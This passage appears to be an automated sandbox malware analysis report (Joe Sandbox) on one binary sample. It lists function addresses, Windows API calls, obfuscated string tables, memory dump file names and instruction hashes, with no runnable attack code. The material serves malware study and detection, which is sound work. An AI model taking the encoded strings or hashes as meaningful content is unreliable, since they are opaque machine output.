                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0008842E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesCreateDirectoryFile
                                                                                                                                                                                    • String ID: \Q^$\Q^$\Q^$@EH]$@EH]$@EH]$@^uS$@^uS$@^uS$@^uS$BPYC$BPYC$BPYC$BPYC$CGDK$CGDK$CGDK$CGDK$DJDB$IIDO$IIDO$IIDO$IIDO$IIDO$IIDO$O\]Z$O\]Z$QIE_$QIE_$QIE_$QIE_$QIE_$SGBO$SGBO$TMJ_$TMJ_$TM[\$TM[\$WI]B$WI]B$WI]B$WI]B$YMYG$YMYG$YMYG$YMYG$\_H\$\_H\$\_H\$aiey$aiey$aiey$aiey$dBAW$dBAW$sz|o$sz|o$sz|o$sz|o$type must be boolean, but is ${i\^${j[E${j[E${j[E${kFE${kFE${kFE
                                                                                                                                                                                    • API String ID: 3883471643-1209422803
                                                                                                                                                                                    • Opcode ID: ab75150c02b77be60f720ab41aa6c31665fae58e66080e1d09c752a2f8b7abdd
                                                                                                                                                                                    • Instruction ID: 93a43ac4d01d3b28f8ce83bfd711720e7f5eaa47667841ce258e84e6e30e779b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab75150c02b77be60f720ab41aa6c31665fae58e66080e1d09c752a2f8b7abdd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E73DD708042688BDF29EB68CC487EEBBB5BF15304F1441D8E089A7292DB759F89CF55
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0008A540 Relevance: 93.7, APIs: 13, Strings: 39, Instructions: 2699COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesCreateDirectoryFile
                                                                                                                                                                                    • String ID: \Q^$\Q^$BPYu$BPYu$BPYu$BPYu$DI[N$DI[N$EM@K$EM@K$FCCZ$FCCZ$G@X#$IAJA$IAJA$IIDO$IIDO$KIZ^$KIZ^$LQCV$LQCV$RIL\$RIL\$SADO$SADO$\_H\$\_H\$_C_W$tBXC$tBXC$tCCq$tCCq$tJB[$tJB[${`@Y${`@Y${j[E${j[E${kj
                                                                                                                                                                                    • API String ID: 3883471643-261706488
                                                                                                                                                                                    • Opcode ID: 6e9f8d5509dfb9472c861e8f7e14af7a1323e62521003a7066e27ff896f38e75
                                                                                                                                                                                    • Instruction ID: 75a51240185415251f8ef87aaef8b293e6f01acdd1fd0456edf81c2f28db2710
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e9f8d5509dfb9472c861e8f7e14af7a1323e62521003a7066e27ff896f38e75
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A43CD709002588BEF29EB28CC58BEEBBB5BF16304F1442D9E089A7292D7745BC5CF55
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000648E0 Relevance: 87.5, APIs: 2, Strings: 47, Instructions: 1745COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 00065986
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0006599B
                                                                                                                                                                                      • Part of subcall function 0003BF90: GetFileAttributesA.KERNEL32 ref: 0003BFBE
                                                                                                                                                                                      • Part of subcall function 0003BF90: __Mtx_unlock.LIBCPMT ref: 0003BFEE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesFile
                                                                                                                                                                                    • String ID: AG[G$AG[G$AG[G$BB^$DM[^$DM[^$EC^\$EM@K$EXXC$FDd`$FDd`$FDd`$KGNC$KGNC$KGNC$KGNC$KGNC$MEAK$OGZ^$WIZY$WIZY$WZFL$WZFL$\C_J$\C_J$cannot use operator[] with a string argument with $psT@$wI]B$wZFL$xYOC$xYOC$xYOC${CLS${CLS${CLS${CLS${CLS${CLS${DFM${KLX${KLX${KLX${KLX${KLX${KLX${X[E${y\K
                                                                                                                                                                                    • API String ID: 1886074773-3293382187
                                                                                                                                                                                    • Opcode ID: 98729bc1080c7019f57eae49a851f53d6b87f73dc693df2fcad926e9c5027bee
                                                                                                                                                                                    • Instruction ID: cab0e7bba33d0678a746bdf49104a03bb2f96627ed9ae92962fc08c9eba3cd2b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 98729bc1080c7019f57eae49a851f53d6b87f73dc693df2fcad926e9c5027bee
                                                                                                                                                                                    • Instruction Fuzzy Hash: EBF2CF70C002588BDF25EB64CC59BEEBBB9AF15304F1442D8E44967283EB745B89CF96
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000882E0 Relevance: 76.3, APIs: 20, Strings: 22, Instructions: 2843COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesCreateDirectoryFile
                                                                                                                                                                                    • String ID: \Q^$\Q^$DJDB$DJDB$E@BO$E@BO$G@X#$IIDO$QIE_$QIE_$SADO$SADO$WI]B$WI]B$\_H\$\_H\$_C_W${`@Y${j[E${j[E${lF]${lF]
                                                                                                                                                                                    • API String ID: 3883471643-2028872817
                                                                                                                                                                                    • Opcode ID: 47e000e3a0a5091098c06708113959b143405aa676e51c67b15fb7b3af36ba00
                                                                                                                                                                                    • Instruction ID: 626f2494e5e8b242bc15e7b8f803633d40f2677cb6128318e2a4d57d078a635a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47e000e3a0a5091098c06708113959b143405aa676e51c67b15fb7b3af36ba00
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B3314709002588FEF29EF68CC487EEBBB5BF16300F1481D9E489A7692D7749A85CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00058570 Relevance: 60.0, APIs: 1, Strings: 32, Instructions: 2231COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: @^uS$BFJX$BFJX$BFJX$BI^$BI^$BPYC$CGDK$DGFA$DGFA$D^Fr$H[vI$H[vI$H[vI$IIDO$KoZW$KoZW$O\]Z$QIE_$QIE_$R\YK$R\YK$R\YK$TMJ_$WI]B$YMYG$YU]Z$YU]Z$YU]Z$cannot use operator[] with a string argument with $dBAW$iM]]
                                                                                                                                                                                    • API String ID: 1620887387-85083418
                                                                                                                                                                                    • Opcode ID: 52c25f8b3ef434d9afa08a568fffe7402b023cee35559c69280f1972b83d6dd6
                                                                                                                                                                                    • Instruction ID: 14c0954a80a1d58e89a5d5cd57651684d983c6100c15e0192f4cde49512032d5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 52c25f8b3ef434d9afa08a568fffe7402b023cee35559c69280f1972b83d6dd6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F23CD70D04258CBDF25DB64C855BEEBBB4AF15304F1442E8E84967282EB746F89CF92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00055A90 Relevance: 59.1, Strings: 45, Instructions: 2804COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: BFJX$BFJX$BFJX$BFJX$BPYu$BPYu$DI[N$DI[N$DI[N$EM@K$EM@K$FCCZ$HZ@M$H[vI$H[vI$H[vI$H[vI$H[vI$H[vI$IAJA$IAJA$IIDO$IIDO$KIZ^$KoZW$KoZW$KoZW$KoZW$LQCV$LQCV$RIL\$R\YK$R\YK$R\YK$R\YK$YU]Z$YU]Z$YU]Z$YU]Z$YU]Z$YU]Z$tBXC$tCCq$tCCq$tJB[
                                                                                                                                                                                    • API String ID: 1620887387-853291600
                                                                                                                                                                                    • Opcode ID: 1ad566286abe5c4f27e9d3cc76cfb9eb324da45505fbd7239d9de4215f217efe
                                                                                                                                                                                    • Instruction ID: e7ea8f1ae24923db90401985dcaeb0d2b1f22e16ca752cdc272ca0a3de2f5e7d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ad566286abe5c4f27e9d3cc76cfb9eb324da45505fbd7239d9de4215f217efe
                                                                                                                                                                                    • Instruction Fuzzy Hash: D343CE70D042588BDB25DF24CC55BEEBBB4AF15304F1441E8E849A7282EB75AF89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0008D180 Relevance: 45.8, APIs: 18, Strings: 7, Instructions: 2073COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00072250: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 000722E0
                                                                                                                                                                                      • Part of subcall function 00072250: CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0007233C
                                                                                                                                                                                      • Part of subcall function 00072250: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0007236D
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,5F45787B,00163AFC,00000000,5F45787B,5F45787C), ref: 0008D282
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D496
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D4A5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D6B6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D6C5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D8C6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008D8D5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008DBC6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008DBD5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E0CE
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E0DD
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E2D6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E2E5
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E4E7
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E4F6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E7E6
                                                                                                                                                                                    • __Mtx_unlock.LIBCPMT ref: 0008E7F5
                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,46487F7B,00163AFC,00000000,46487F7B,46487F7C), ref: 0008DEBC
                                                                                                                                                                                      • Part of subcall function 0009D850: Concurrency::cancel_current_task.LIBCPMT ref: 0009D92D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$CreateDirectory$Concurrency::cancel_current_taskFolderPath
                                                                                                                                                                                    • String ID: GIY]$SIIj$kGJK$nFMO$tQGI${n@F${xE_
                                                                                                                                                                                    • API String ID: 791088107-847423877
                                                                                                                                                                                    • Opcode ID: 824f6cac376d0ae5e109156efad1b3fed2b005c1d2b8e795eebfc6abbd47e466
                                                                                                                                                                                    • Instruction ID: 4ecb0f251edc5ebdcb9adeabaaa07a926eba361a42825f667661b6e5287caa7e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 824f6cac376d0ae5e109156efad1b3fed2b005c1d2b8e795eebfc6abbd47e466
                                                                                                                                                                                    • Instruction Fuzzy Hash: 85030931D00258CFDF18EB68CC94BEDBB75BF16304F14829CE489A7292DB759A85CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0003F050 Relevance: 43.7, APIs: 19, Strings: 5, Instructions: 1719COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock$AttributesFile
                                                                                                                                                                                    • String ID: J@}$NTHJ$[_CS${aGN${dFI
                                                                                                                                                                                    • API String ID: 1886074773-2598508030
                                                                                                                                                                                    • Opcode ID: 7fa171adc0bd1a65327569c34b1a743b4bf290e2fae6732c8ae7e1e1dd54e19a
                                                                                                                                                                                    • Instruction ID: 990460d7fffb714b5b34e1a57605ff39c922690dcfcaf112a01aea3ae2447ebd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fa171adc0bd1a65327569c34b1a743b4bf290e2fae6732c8ae7e1e1dd54e19a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BD25970D002099BDF09DBB8CC957FEBBB9AF16304F24826CE445B7192D7749A85CBA1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0007DB80 Relevance: 42.5, Strings: 33, Instructions: 1269COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
